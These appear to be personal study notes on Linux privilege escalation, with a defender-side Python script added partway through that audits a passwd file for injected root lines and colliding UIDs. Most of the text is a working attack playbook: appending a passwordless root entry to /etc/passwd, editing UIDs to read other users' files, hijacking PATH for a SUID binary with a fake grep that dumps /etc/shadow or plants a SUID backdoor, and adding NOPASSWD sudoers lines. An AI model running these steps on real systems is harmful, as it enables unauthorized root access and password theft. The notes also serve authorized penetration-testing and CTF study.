Linux Escalation
Some shells have vulnerabilities that others do not. The default bash program has far fewer vulns than shells like zsh. We can copy a shell to a directory we have root privs on and then chmod 4755 the new program. When we launch this local program we will then have root privs. We can also change the symbolic links for shells to point at a shell program that we want to run.
//changing symbolic link
//this one has us doing it as root though and is from my sec class
//might be unreliable since we don't have root
$ su
Password: (enter root password)
# cd /bin
# rm sh
# ln -s zsh sh
(we had sudo rights for a file owned by user 1000):
$sudo -u#1000 ./file.sh
#echo root::0:0:root:/root:/bin/bash >> /etc/passwd
#su
#openssl passwd mypassword
//this outputs a hashed password like ASWsdfhjL56. Add it between the colons of the new root line and save; then we can either su to root or ssh in as root.
#cd home/ && ls
We got denied the file read so we decide to try and add a user with the same UID of 1014.
#sudo adduser pwn
//we were automatically assigned UID 1001, so we need to change it to 1014 to read the file.
#sudo sed -i -e 's/1001/1014/g' /etc/passwd
//-i edit the file in place, -e supply the sed expression to run
check with:
#cat /etc/passwd | grep pwn
#su pwn
#id
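As an added defender-side example that is not part of these notes, this Python script audits a passwd file for the traces the two steps above leave behind: a duplicate root record with an empty password field, and an account whose UID was rewritten to collide with another account's. The sample file is constructed.

```python
"""Audit a passwd file for a second root/UID-0 line (possibly with an empty
password field) and for a UID that was edited to collide with another account."""
from collections import Counter, defaultdict

# Constructed sample, not a real /etc/passwd: a small baseline plus the two
# injected records (a passwordless root clone and 'pwn' rewritten to UID 1014).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1014:1014:Alice:/home/alice:/bin/bash
pwn:x:1014:1001:,,,:/home/pwn:/bin/bash
root::0:0:root:/root:/bin/bash
"""

def parse_passwd(text):
    """Return (name, password_field, uid, line_no) for each well-formed record."""
    entries = []
    for line_no, line in enumerate(text.splitlines(), 1):
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue  # not a valid 7-field passwd record; skip it
        entries.append((fields[0], fields[1], int(fields[2]), line_no))
    return entries

def audit_passwd(text):
    """Return a list of human-readable findings; an empty list means clean."""
    findings = []
    by_uid = defaultdict(list)
    name_count = Counter()
    for name, pw, uid, line_no in parse_passwd(text):
        by_uid[uid].append(name)
        name_count[name] += 1
        if uid == 0 and name != "root":
            findings.append(f"line {line_no}: non-root account '{name}' has UID 0")
        if pw == "":  # empty field means no password is required to log in
            findings.append(f"line {line_no}: account '{name}' has an empty password field")
    for name, count in sorted(name_count.items()):
        if count > 1:
            findings.append(f"account name '{name}' appears {count} times")
    for uid, names in sorted(by_uid.items()):
        if len(names) > 1:
            findings.append(f"UID {uid} shared by: {', '.join(names)}")
    return findings

if __name__ == "__main__":
    # On a real host, replace SAMPLE_PASSWD with open("/etc/passwd").read().
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```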
#cat /etc/issue
#cat /etc/*-release
#ps axu
#ip a
#/sbin/route
#ss -anp
-Check /etc/iptables
-We can also search for files created by the iptables-save command, which is used to dump the firewall configuration to a file specified by the user. This file is then usually used as input for the iptables-restore command to restore the firewall rules at boot time. If a system administrator has ever run this command, we could search the configuration directory (/etc) or grep the file system for iptables commands to locate the file.
#ls -lah /etc/cron*
#cat /etc/crontab
//search for cron jobs writable by all users
find /etc/cron* -type f -perm -o+w -exec ls -l {} \;
#dpkg -l
or
#rpm -qa
# find / -writable -type d 2>/dev/null
#cat /etc/fstab
and
#mount
all avail disks:
#/bin/lsblk
#lsmod
#/sbin/modinfo <module to look at>
#find / -perm -u=s -type f 2>/dev/null
or
#find / -perm /4000 2>/dev/null
//Now get a list of all the default SUID files for that operating system and compare to see which are not default installations and are likely user-added.
Run the suid binary (this case bash) with the suid bit:
#./bash -p
//if you ever need to launch a shell file with SUID make sure to try using /bin/dash, since dash won't drop SUID bits the way bash will.
Show library calls of SUID files:
//shows the library calls a program makes. This is good for seeing how the program uses its command arguments, so we can abuse them.
#ltrace /usr/bin/checkHost 8.8.8.8
//there is also #strace, which shows system calls, but it will DoS you with too much information.
In this example we saw it was running the command "ping 8.8.8.8 |grep tra" //since grep is not path specified ("/bin/grep"), we can make our own grep command and force its use with the SUID bit.
This first file method is best because it will give you passwords and not just root.
----file---named-->grep
#!/bin/dash
cat /etc/shadow
---------------------
--or--auto-root---
#!/bin/dash
cp /bin/dash backdoor
chown root:root backdoor
chmod u+s backdoor
--------------------
--or-r-shell--------
#!/bin/dash
nc shell here
---------------------
#chmod 755 grep
#export PATH=.:$PATH
//tells OS to check our current directory for binary programs before looking at /bin
//so now if we run the program it will give us a root shell
#checkHost 8.8.8.8
//returns the shadow file, which we can then run JTR against
Env variables for history:
$HISTSIZE
//number of commands stored in history for the current user and session
$HISTFILESIZE
//how many commands are stored in the history file
config file where these settings are saved: .bashrc
Run a command from history:
#history
pick the number then:
#!3
can rerun last command with:
#!!
Search cmd history:
ctrl-r then start typing command name
fc:
With "fc" we can list command line history and also edit previous commands in a vi-like editor before re-executing them. This is shell-local and not built into the OS.
List commands:
#fc -l
// we can append numbers to the end to select ranges or specific commands
Monitor processes to check for running cron jobs.
add yourself to the sudoers file:
#echo -e "\nwww-data ALL=(ALL) NOPASSWD: ALL"
echo -e "\njeremy ALL=(ALL) NOPASSWD: ALL"
Process Spying:
located in /opt/pspy/
check the vuln box's kernel and architecture:
#uname -a
on attacker build the tool (in pspy dir):
#GOOS=linux GOARCH=amd64 go build